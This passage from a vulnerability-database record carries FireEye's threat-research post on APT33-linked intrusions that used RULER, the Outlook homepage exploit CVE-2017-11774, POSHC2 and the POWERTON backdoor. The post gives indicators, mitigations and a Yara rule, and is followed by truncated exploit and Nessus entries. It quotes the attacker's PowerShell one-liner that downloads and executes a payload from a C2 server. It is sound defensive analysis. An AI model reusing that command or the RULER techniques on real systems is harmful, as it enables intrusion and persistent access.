reconstructed an operational timeline based on confirmed APT33 activity observed in the last year. We compared that to the timeline of the contained intrusions and determined there were circumstantial overlaps to include remarkable similarities in tool selection during specified timeframes. We assess with low confidence that the intrusions were conducted by APT33. This blog contains original source material only, whereas Finished Intelligence including an all-source analysis is [available within our intelligence portal](<https://intelligence.fireeye.com/reports/18-00021316>). To best understand the techniques employed by the adversary, it is necessary to provide background on our Managed Defense response to this activity during their 24x7 monitoring.\n\n#### Managed Defense Rapid Responses: Investigating the Attacker\n\nIn mid-November 2017, Managed Defense identified and responded to targeted threat activity at a customer within the engineering industry. The adversary leveraged stolen credentials and a publicly available tool, SensePost\u2019s [RULER](<https://github.com/sensepost/ruler>), to configure a client-side mail rule crafted to download and execute a malicious payload from an adversary-controlled WebDAV server 85.206.161[.]214@443\\outlook\\live.exe (MD5: _95f3bea43338addc1ad951cd2d42eb6f_).\n\nThe payload was an AutoIT downloader that retrieved and executed additional PowerShell from hxxps://85.206.161[.]216:8080/HomePage.htm. The follow-on PowerShell profiled the target system\u2019s architecture, downloaded the appropriate variant of PowerSploit (MD5: _c326f156657d1c41a9c387415bf779d4_ or _0564706ec38d15e981f71eaf474d0ab8_), and reflectively loaded PUPYRAT (MD5: _94cd86a0a4d747472c2b3f1bc3279d77_ or _17587668AC577FCE0B278420B8EB72AC_). The actor leveraged a publicly available exploit for CVE-2017-0213 to escalate privileges, publicly available Windows SysInternals PROCDUMP to dump the LSASS process, and publicly available MIMIKATZ to presumably steal additional credentials. Managed Defense aided the victim in containing the intrusion.\n\nFireEye collected 168 PUPYRAT samples for a comparison. While import hashes (IMPHASH) are insufficient for attribution, we found it remarkable that out of the specified sampling, the actor\u2019s IMPHASH was found in only six samples, two of which were confirmed to belong to the threat actor observed in Managed Defense, and one which is attributed to APT33. We also determined APT33 likely transitioned from PowerShell EMPIRE to PUPYRAT during this timeframe.\n\nIn mid-July of 2018, Managed Defense identified similar targeted threat activity focused against the same industry. The actor leveraged stolen credentials and RULER\u2019s module that exploits CVE-2017-11774 (RULER.HOMEPAGE), modifying numerous users\u2019 Outlook client homepages for code execution and persistence. These methods are further explored in this post in the \"RULER In-The-Wild\" section.\n\nThe actor leveraged this persistence mechanism to download and execute OS-dependent variants of the publicly available .NET POSHC2 backdoor as well as a newly identified PowerShell-based implant self-named POWERTON. Managed Defense rapidly engaged and successfully contained the intrusion. Of note, Advanced Practices separately established that APT33 began using POSHC2 as of at least July 2, 2018, and continued to use it throughout the duration of 2018.\n\nDuring the July activity, Managed Defense observed three variations of the homepage exploit hosted at hxxp://91.235.116[.]212/index.html. One example is shown in Figure 1.\n\n \nFigure 1: Attacker\u2019s homepage exploit (CVE-2017-11774)\n\nThe main encoded payload within each exploit leveraged WMIC to conduct system profiling in order to determine the appropriate OS-dependent POSHC2 implant and dropped to disk a PowerShell script named \u201cMedia.ps1\u201d within the user\u2019s %LOCALAPPDATA% directory (%LOCALAPPDATA%\\MediaWs\\Media.ps1) as shown in Figure 2.\n\n \nFigure 2: Attacker\u2019s \u201cMedia.ps1\u201d script\n\nThe purpose of \u201cMedia.ps1\u201d was to decode and execute the downloaded binary payload, which was written to disk as \u201cC:\\Users\\Public\\Downloads\\log.dat\u201d. At a later stage, this PowerShell script would be configured to persist on the host via a registry Run key.\n\nAnalysis of the \u201clog.dat\u201d payloads determined them to be variants of the publicly available POSHC2 proxy-aware stager written to download and execute PowerShell payloads from a hardcoded command and control (C2) address. These particular POSHC2 samples run on the .NET framework and dynamically load payloads from Base64 encoded strings. The implant will send a reconnaissance report via HTTP to the C2 server (hxxps://51.254.71[.]223/images/static/content/) and subsequently evaluate the response as PowerShell source code. The reconnaissance report contains the following information:\n\n * Username and domain\n * Computer name\n * CPU details\n * Current exe PID\n * Configured C2 server\n\nThe C2 messages are encrypted via AES using a hardcoded key and encoded with Base64. It is this POSHC2 binary that established persistence for the aforementioned \u201cMedia.ps1\u201d PowerShell script, which then decodes and executes the POSHC2 binary upon system startup. During the identified July 2018 activity, the POSHC2 variants were configured with a kill date of July 29, 2018.\n\nPOSHC2 was leveraged to download and execute a new PowerShell-based implant self-named POWERTON (hxxps://185.161.209[.]172/api/info)_. _The adversary had limited success with interacting with POWERTON during this time. The actor was able to download and establish persistence for an AutoIt binary named \u201cClouldPackage.exe\u201d (MD5: 46038aa5b21b940099b0db413fa62687), which was achieved via the POWERTON \u201cpersist\u201d command. The sole functionality of \u201cClouldPackage.exe\u201d was to execute the following line of PowerShell code:\n\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; $webclient = new-object System.Net.WebClient; $webclient.Credentials = new-object System.Net.NetworkCredential('public', 'fN^4zJp{5w#K0VUm}Z_a!QXr*]&2j8Ye'); iex $webclient.DownloadString('hxxps://185.161.209[.]172/api/default')\n\nThe purpose of this code is to retrieve \u201csilent mode\u201d POWERTON from the C2 server. Note the actor protected their follow-on payloads with strong credentials. Shortly after this, Managed Defense contained the intrusion.\n\nStarting approximately three weeks later, the actor reestablished access through a successful password spray. Managed Defense immediately identified the actor deploying malicious homepages with RULER to persist on workstations. They made some infrastructure and tooling changes to include additional layers of obfuscation in an attempt to avoid detection. The actor hosted their homepage exploit at a new C2 server (hxxp://5.79.66[.]241/index.html). At least three new variations of \u201cindex.html\u201d were identified during this period. Two of these variations contained encoded PowerShell code written to download new OS-dependent variants of the .NET POSHC2 binaries, as seen in Figure 3.\n\n \nFigure 3: OS-specific POSHC2 Downloader\n\nFigure 3 shows that the actor made some minor changes, such as encoding the PowerShell \"DownloadString\" commands and renaming the resulting POSHC2 and .ps1 files dropped to disk. Once decoded, the commands will attempt to download the POSHC2 binaries from yet another new C2 server (hxxp://103.236.149[.]124/delivered.dat). The name of the .ps1 file dropped to decode and execute the POSHC2 variant also changed to \u201cVision.ps1\u201d. During this August 2018 activity, the POSHC2 variants were configured with a \u201ckill date\u201d of Aug. 13, 2018. Note that POSHC2 supports a kill date in order to guardrail an intrusion by time and this functionality is built into the framework.****\n\nOnce again, POSHC2 was used to download a new variant of POWERTON (MD5: _c38069d0bc79acdc28af3820c1123e53_), configured to communicate with the C2 domain hxxps://basepack[.]org. At one point in late-August, after the POSHC2 kill date, the adversary used RULER.HOMEPAGE to directly download POWERTON, bypassing the intermediary stages previously observed.****\n\nDue to Managed Defense\u2019s early containment of these intrusions, we were unable to ascertain the actor\u2019s motivations; however, it was clear they were adamant about gaining and maintaining access to the victim\u2019s network.****\n\n#### Adversary Pursuit: Infrastructure Monitoring\n\nAdvanced Practices conducts aggressive proactive operations in order to identify and monitor adversary infrastructure at scale. The adversary maintained a RULER.HOMEPAGE payload at hxxp://91.235.116[.]212/index.html between July 16 and Oct. 11, 2018. On at least Oct. 11, 2018, the adversary changed the payload (MD5: _8be06571e915ae3f76901d52068e3498_) to download and execute a POWERTON sample from hxxps://103.236.149[.]100/api/info_ _(MD5: _4047e238bbcec147f8b97d849ef40ce5_). This specific URL was identified in a [public discussion](<https://twitter.com/KseProso/status/1073169197541281792>) as possibly related to recent destructive attacks. We are unable to independently verify this correlation with any organic information we possess.\n\nOn Dec. 13, 2018, Advanced Practices proactively identified and attributed a malicious RULER.HOMEPAGE payload hosted at hxxp://89.45.35[.]235/index.html (MD5: _f0fe6e9dde998907af76d91ba8f68a05_). The payload was crafted to download and execute POWERTON hosted at hxxps://staffmusic[.]org/transfer/view (MD5: _53ae59ed03fa5df3bf738bc0775a91d9_).\n\nTable 1 contains the operational timeline for the activity we analyzed.****\n\n**DATE/TIME (UTC)**\n\n| \n\n**NOTE**\n\n| \n\n**INDICATOR** \n \n---|---|--- \n \n2017-08-15 17:06:59\n\n| \n\nAPT33 \u2013 EMPIRE (Used)\n\n| \n\n8a99624d224ab3378598b9895660c890 \n \n2017-09-15 16:49:59\n\n| \n\nAPT33 \u2013 PUPYRAT (Compiled)\n\n| \n\n4b19bccc25750f49c2c1bb462509f84e \n \n2017-11-12 20:42:43\n\n| \n\nGroupA \u2013 AUT2EXE Downloader (Compiled)\n\n| \n\n95f3bea43338addc1ad951cd2d42eb6f \n \n2017-11-14 14:55:14\n\n| \n\nGroupA \u2013 PUPYRAT (Used)\n\n| \n\n17587668ac577fce0b278420b8eb72ac \n \n2018-01-09 19:15:16\n\n| \n\nAPT33 \u2013 PUPYRAT (Compiled)\n\n| \n\n56f5891f065494fdbb2693cfc9bce9ae \n \n2018-02-13 13:35:06\n\n| \n\nAPT33 \u2013 PUPYRAT (Used)\n\n| \n\n56f5891f065494fdbb2693cfc9bce9ae \n \n2018-05-09 18:28:43\n\n| \n\nGroupB \u2013 AUT2EXE (Compiled)\n\n| \n\n46038aa5b21b940099b0db413fa62687 \n \n2018-07-02 07:57:40\n\n| \n\nAPT33 \u2013 POSHC2 (Used)\n\n| \n\nfa7790abe9ee40556fb3c5524388de0b \n \n2018-07-16 00:33:01\n\n| \n\nGroupB \u2013 POSHC2 (Compiled)\n\n| \n\n75e680d5fddbdb989812c7ba83e7c425 \n \n2018-07-16 01:39:58\n\n| \n\nGroupB \u2013 POSHC2 (Used)\n\n| \n\n75e680d5fddbdb989812c7ba83e7c425 \n \n2018-07-16 08:36:13\n\n| \n\nGroupB \u2013 POWERTON (Used)\n\n| \n\n46038aa5b21b940099b0db413fa62687 \n \n2018-07-31 22:09:25\n\n| \n\nAPT33 \u2013 POSHC2 (Used)\n\n| \n\n129c296c363b6d9da0102aa03878ca7f \n \n2018-08-06 16:27:05\n\n| \n\nGroupB \u2013 POSHC2 (Compiled)\n\n| \n\nfca0ad319bf8e63431eb468603d50eff \n \n2018-08-07 05:10:05\n\n| \n\nGroupB \u2013 POSHC2 (Used)\n\n| \n\n75e680d5fddbdb989812c7ba83e7c425 \n \n2018-08-29 18:14:18\n\n| \n\nAPT33 \u2013 POSHC2 (Used)\n\n| \n\n5832f708fd860c88cbdc088acecec4ea \n \n2018-10-09 16:02:55\n\n| \n\nAPT33 \u2013 POSHC2 (Used)\n\n| \n\n8d3fe1973183e1d3b0dbec31be8ee9dd \n \n2018-10-09 16:48:09\n\n| \n\nAPT33 \u2013 POSHC2 (Used)\n\n| \n\n48d1ed9870ed40c224e50a11bf3523f8 \n \n2018-10-11 21:29:22\n\n| \n\nGroupB \u2013 POWERTON (Used)\n\n| \n\n8be06571e915ae3f76901d52068e3498 \n \n2018-12-13 11:00:00\n\n| \n\nGroupB \u2013 POWERTON (Identified)\n\n| \n\n99649d58c0d502b2dfada02124b1504c \n \nTable 1: Operational Timeline\n\n#### Outlook and Implications\n\nIf the activities observed during these intrusions are linked to APT33, it would suggest that APT33 has likely maintained proprietary capabilities we had not previously observed until sustained pressure from Managed Defense forced their use. FireEye Intelligence has previously reported that APT33 has ties to destructive malware, and they pose a heightened risk to critical infrastructure. This risk is pronounced in the energy sector, which we consistently observe them target. That targeting aligns with Iranian national priorities for economic growth and competitive advantage, especially relating to petrochemical production.\n\nWe will continue to track these clusters independently until we achieve high confidence that they are the same. The operators behind each of the described intrusions are using publicly available but not widely understood tools and techniques in addition to proprietary implants as needed. Managed Defense has the privilege of being exposed to intrusion activity every day across a wide spectrum of industries and adversaries. This daily front line experience is backed by Advanced Practices, FireEye Labs Advanced Reverse Engineering (FLARE), and FireEye Intelligence to give our clients every advantage they can have against sophisticated adversaries. We welcome additional original source information we can evaluate to confirm or refute our analytical judgements on attribution.\n\n#### Custom Backdoor: POWERTON\n\nPOWERTON is a backdoor written in PowerShell; FireEye has not yet identified any publicly available toolset with a similar code base, indicating that it is likely custom-built. POWERTON is designed to support multiple persistence mechanisms, including [WMI](<https://www.fireeye.com/blog/threat-research/2016/08/wmi_vs_wmi_monitor.html>) and auto-run registry key. Communications with the C2 are over TCP/HTTP(S) and leverage AES encryption for communication traffic to and from the C2. POWERTON typically gets deployed as a later stage backdoor and is obfuscated several layers.\n\nFireEye has witnessed at least two separate versions of POWERTON, tracked separately as POWERTON.v1 and POWERTON.v2, wherein the latter has improved its command and control functionality, and integrated the ability to dump password hashes.\n\nTable 2 contains samples of POWERTON.\n\n**Hash of Obfuscated File (MD5)**\n\n| \n\n**Hash of Deobfuscated File (MD5)**\n\n| \n\n**Version** \n \n---|---|--- \n \n**974b999186ff434bee3ab6d61411731f**\n\n| \n\n3871aac486ba79215f2155f32d581dc2\n\n| \n\nV1 \n \n**e2d60bb6e3e67591e13b6a8178d89736**\n\n| \n\n2cd286711151efb61a15e2e11736d7d2\n\n| \n\nV1 \n \n**bd80fcf5e70a0677ba94b3f7c011440e**\n\n| \n\n5a66480e100d4f14e12fceb60e91371d\n\n| \n\nV1 \n \n**4047e238bbcec147f8b97d849ef40ce5**\n\n| \n\nf5ac89d406e698e169ba34fea59a780e\n\n| \n\nV2 \n \n**c38069d0bc79acdc28af3820c1123e53**\n\n| \n\n4aca006b9afe85b1f11314b39ee270f7\n\n| \n\nV2 \n \n**N/A**\n\n| \n\n7f4f7e307a11f121d8659ca98bc8ba56\n\n| \n\nV2 \n \n**53ae59ed03fa5df3bf738bc0775a91d9**\n\n| \n\n99649d58c0d502b2dfada02124b1504c\n\n| \n\nV2 \n \nTable 2: POWERTON malware samples\n\n#### Adversary Methods: Email Exploitation on the Rise\n\nOutlook and Exchange are ubiquitous with the concept of email access. User convenience is a primary driver behind technological advancements, but convenient access for users often reveals additional attack surface for adversaries. As organizations expose any email server access to the public internet for its users, those systems become intrusion vectors. FireEye has observed an increase in [targeted adversaries challenging and subverting security controls on Exchange and Office365.](<https://summit.fireeye.com/content/fireeye-summit/en_US/learn/tracks.html#technical-3>) Our Mandiant consultants also presented [several new methods used by adversaries to subvert multifactor authentication](<https://summit.fireeye.com/learn/tracks.html#technical-8>) at FireEye Cyber Defense Summit 2018.\n\nAt FireEye, our decisions are data driven, but data provided to us is often incomplete and missing pieces must be inferred based on our expertise in order for us to respond to intrusions effectively. A plausible scenario for exploitation of this vector is as follows.\n\nAn adversary has a single pair of valid credentials for a user within your organization obtained through any means, to include the following non-exhaustive examples:\n\n * Third party breaches where your users have re-used credentials; does your enterprise leverage a naming standard for email addresses such as first.last@yourorganization.tld? It is possible that a user within your organization has a personal email address with a first and last name--and an affiliated password--compromised in a third-party breach somewhere. Did they re-use that password?\n * Previous compromise within your organization where credentials were compromised but not identified or reset.\n * Poor password choice or password security policies resulting in brute-forced credentials.\n * Gathering of crackable password hashes from various other sources, such as NTLM hashes gathered via [documents](<https://bohops.com/2018/08/04/capturing-netntlm-hashes-with-office-dot-xml-documents/>) intended to phish them from users.\n * Credential harvesting phishing scams, where harvested credentials may be sold, re-used, or documented permanently elsewhere on the internet.\n\nOnce the adversary has legitimate credentials, they identify publicly accessible Outlook Web Access (OWA) or Office 365 that is not protected with multi-factor authentication. The adversary leverages the stolen credentials and a tool like RULER to deliver exploits through Exchange\u2019s legitimate features.\n\n#### RULER In-The-Wild: Here, There, and Everywhere\n\nSensePost\u2019s RULER is a tool designed to interact with Exchange servers via a messaging application programming interface (MAPI), or via remote procedure calls (RPC), both over HTTP protocol. As detailed in the \"Managed Defense Rapid Responses\" section, in mid-November 2017, FireEye witnessed network activity generated by an existing Outlook email client process on a single host, indicating connection via Web Distributed Authoring and Versioning (WebDAV) to an adversary-controlled IP address 85.206.161[.]214. This communication retrieved an executable created with _Aut2Exe_ (MD5: _95f3bea43338addc1ad951cd2d42eb6f)_, and executed a PowerShell one-liner to retrieve further malicious content.\n\nWithout the requisite logging from the impacted mailbox, we can still assess that this activity was the result of a malicious mail rule created using the aforementioned tooling for the following reasons:\n\n * Outlook.exe directly requested the malicious executable hosted at the adversary IP address over WebDAV. This is unexpected unless some feature of Outlook directly was exploited; traditional vectors like phishing would show a process ancestry where Outlook spawned a child process of an Office product, Acrobat, or something similar. Process injection would imply prior malicious code execution on the host, which evidence did not support.\n * The transfer of _95f3bea43338addc1ad951cd2d42eb6f_ was over WebDAV. RULER facilitates this by exposing a simple WebDAV server, and a command line module for creating a client-side mail rule to point at that [WebDAV hosted payload](<https://github.com/sensepost/ruler/wiki/Rules#webdav>).\n * The choice of WebDAV for this initial transfer of stager is the result of restrictions in mail rule creation; the payload must be \"locally\" accessible before the rule can be saved, meaning protocol handlers for something like HTTP or FTP are not permitted. This is thoroughly detailed in Silent Break Security's [initial write-up](<https://silentbreaksecurity.com/malicious-outlook-rules/>) prior to RULER\u2019s creation. This leaves SMB and WebDAV via UNC file pathing as the available options for transferring your malicious payload via an Outlook Rule. WebDAV is likely the less alerting option from a networking perspective, as one is more likely to find WebDAV transactions occurring over ports 80 and 443 to the internet than they are to find a domain joined host communicating via SMB to a non-domain joined host at an arbitrary IP address.\n * The payload to be executed via Outlook client-side mail rule must contain no arguments, which is likely why a compiled Aut2exe executable was chosen. _95f3bea43338addc1ad951cd2d42eb6f_ does nothing but execute a PowerShell one-liner to retrieve additional malicious content for execution. However, execution of this command natively using an Outlook rule was not possible due to this limitation.\n\nWith that in mind, the initial infection vector is illustrated in Figure 4.\n\n \nFigure 4: Initial infection vector\n\nAs both attackers and defenders continue to explore email security, publicly-released techniques and exploits are quickly adopted. SensePost's identification and responsible [disclosure of CVE-2017-11774](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-11774>) was no different. For an excellent description of abusing Outlook's home page for shell and persistence from an attacker\u2019s perspective, [refer to SensePost's blog](<https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/>).\n\nFireEye [has observed](<https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf>) and [documented](<https://twitter.com/ItsReallyNick/status/1014522001900306433>) an uptick in several malicious attackers' usage of this specific home page exploitation technique. Based on our experience, this particular method may be more successful due to defenders misinterpreting artifacts and focusing on incorrect mitigations. This is understandable, as some defenders may first learn of successful CVE-2017-11774 exploitation when observing Outlook spawning processes resulting in malicious code execution. When this observation is combined with standalone forensic artifacts that may look similar to malicious HTML Application (.hta) attachments, the evidence may be misinterpreted as initial infection via a phishing email. This incorrect assumption overlooks the fact that attackers require valid credentials to deploy CVE-2017-11774, and thus the scope of the compromise may be greater than individual users' Outlook clients where home page persistence is discovered. To assist defenders, we're including a Yara rule to differentiate these Outlook home page payloads at the end of this post.\n\nUnderstanding this nuance further highlights the exposure to this technique when combined with password spraying as documented with this attacker, and underscores the importance of layered email security defenses, including multi-factor authentication and patch management. We recommend the organizations reduce their email attack surface as much as possible. Of note, organizations that choose to host their email with a cloud service provider must still ensure the software clients used to access that server are patched. Beyond implementing multi-factor authentication for Outlook 365/Exchange access, the Microsoft security updates in Table 3 will assist in mitigating known and documented attack vectors that are exposed for exploitation by toolkits such as SensePost\u2019s RULER.\n\n**Microsoft Outlook Security Update**\n\n| \n\n**RULER Module Addressed** \n \n---|--- \n \n[June 13, 2017 Security Update](<https://support.microsoft.com/en-us/help/3191938/descriptionofthesecurityupdateforoutlook2013june13-2017>)\n\n| \n\n[RULER.RULES](<https://sensepost.com/blog/2016/mapi-over-http-and-mailrule-pwnage/>) \n \n[September 12, 2017 Security Update](<https://support.microsoft.com/en-us/help/4011091/descriptionofthesecurityupdateforoutlook2016september12-2017>)\n\n| \n\n[RULER.FORMS](<https://sensepost.com/blog/2017/outlook-forms-and-shells/>) \n \n[October 10, 2017 Security Update](<https://support.microsoft.com/en-us/help/4011162/description-of-the-security-update-for-outlook-2016-october-10-2017>)\n\n| \n\n[RULER.HOMEPAGE](<https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/>) \n \nTable 3: Outlook attack surface mitigations\n\n#### Detecting the Techniques\n\nFireEye detected this activity across our platform, including named detection for POSHC2, PUPYRAT, and POWERTON. Table 4 contains several specific detection names that applied to the email exploitation and initial infection activity.****\n\n**PLATFORM**\n\n| \n\n**SIGNATURE NAME** \n \n---|--- \n \nEndpoint Security\n\n| \n\nPOWERSHELL ENCODED REMOTE DOWNLOAD (METHODOLOGY) \nSUSPICIOUS POWERSHELL USAGE (METHODOLOGY) \nMIMIKATZ (CREDENTIAL STEALER) \nRULER OUTLOOK PERSISTENCE (UTILITY) \n \nNetwork and Email Security\n\n| \n\nFE_Exploit_HTML_CVE201711774 \nFE_HackTool_Win_RULER \nFE_HackTool_Linux_RULER \nFE_HackTool_OSX_RULER \nFE_Trojan_OLE_RULER \nHackTool.RULER (Network Traffic) \n \nTable 4: FireEye product detections\n\nFor organizations interested in hunting for Outlook home page shell and persistence, we\u2019ve included a Yara rule that can also be used for context to differentiate these payloads from other scripts:\n\nrule Hunting_Outlook_Homepage_Shell_and_Persistence \n{ \nmeta: \nauthor = \"Nick Carr (@itsreallynick)\" \nreference_hash = \"506fe019d48ff23fac8ae3b6dd754f6e\" \nstrings: \n$script_1 = \"<htm\" ascii nocase wide \n$script_2 = \"<script\" ascii nocase wide \n$viewctl1_a = \"ViewCtl1\" ascii nocase wide \n$viewctl1_b = \"0006F063-0000-0000-C000-000000000046\" ascii wide \n$viewctl1_c = \".OutlookApplication\" ascii nocase wide \ncondition: \nuint16(0) != 0x5A4D and all of ($script*) and any of ($viewctl1*) \n}\n\n#### Acknowledgements\n\nThe authors would like to thank Matt Berninger for providing data science support for attribution augmentation projects, Omar Sardar (FLARE) for reverse engineering POWERTON, and Joseph Reyes (FireEye Labs) for continued comprehensive Outlook client exploitation product coverage.\n", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-12-21T14:00:00", "type": "fireeye", "title": "OVERRULED: Containing a Potentially Destructive Adversary", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11774", "CVE-2017-0213"], "modified": "2018-12-21T14:00:00", "id": "FIREEYE:A6971C196BCA3B73B3F64A1FE0801A5B", "href": "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "githubexploit": [{"lastseen": "2022-03-15T18:45:13", "description": "#### \u5f15\u7528 ####\n\n>\u8fd9\u4e2a\u6f0f\u6d1e\u5c5e\u4e8eWindows\u00a0CardSpace\u670d\u52a1\u672a\u6b63\u786e\u5904\u7406\u7b26\u53f7\u94fe\u63a5\u5bf9\u8c61\u5bfc\u81f4\u7684\u4efb\u610f\u6587\u4ef6\u66ff\u6362\u7684\u672c\u5730\u6743...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-06-01T04:44:05", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0787", "CVE-2017-0213", "CVE-2020-1066"], "modified": "2022-03-15T16:18:20", "id": "FB99D0AC-3747-583A-AE7D-EE0F4E626D66", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "nessus": [{"lastseen": "2022-06-16T16:22:24", "description": "The remote Windows host is missing multiple security updates released on 2017/05/09. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the Windows improperly handles objects in memory.\n (CVE-2017-0077)\n\n - A denial of service vulnerability exists in Windows DNS Server if the server is configured to answer version queries. An attacker who successfully exploited this vulnerability could cause the DNS Server service to become nonresponsive. (CVE-2017-0171)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface+ (GDI+) handles objects in memory, allowing an attacker to retrieve information from a targeted system.\n (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. (CVE-2017-0214)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0175, CVE-2017-0220)\n\n - An information disclosure vulnerability exists in the way some ActiveX objects are instantiated. An attacker who successfully exploited this vulnerability could gain access to protected memory contents. (CVE-2017-0242)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions. On systems with Windows 7 for x64-based Systems or later installed, this vulnerability can lead to denial of service.\n (CVE-2017-0244)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-0245)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. On computers with Windows 7 for x64-based systems or later installed, this vulnerability can lead to denial of service.\n (CVE-2017-0246)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n (CVE-2017-0258)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory.\n (CVE-2017-0263)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)\n\n - An information disclosure vulnerability exists in the GDI component due to improper handling of objects in memory. An unauthenticated, remote 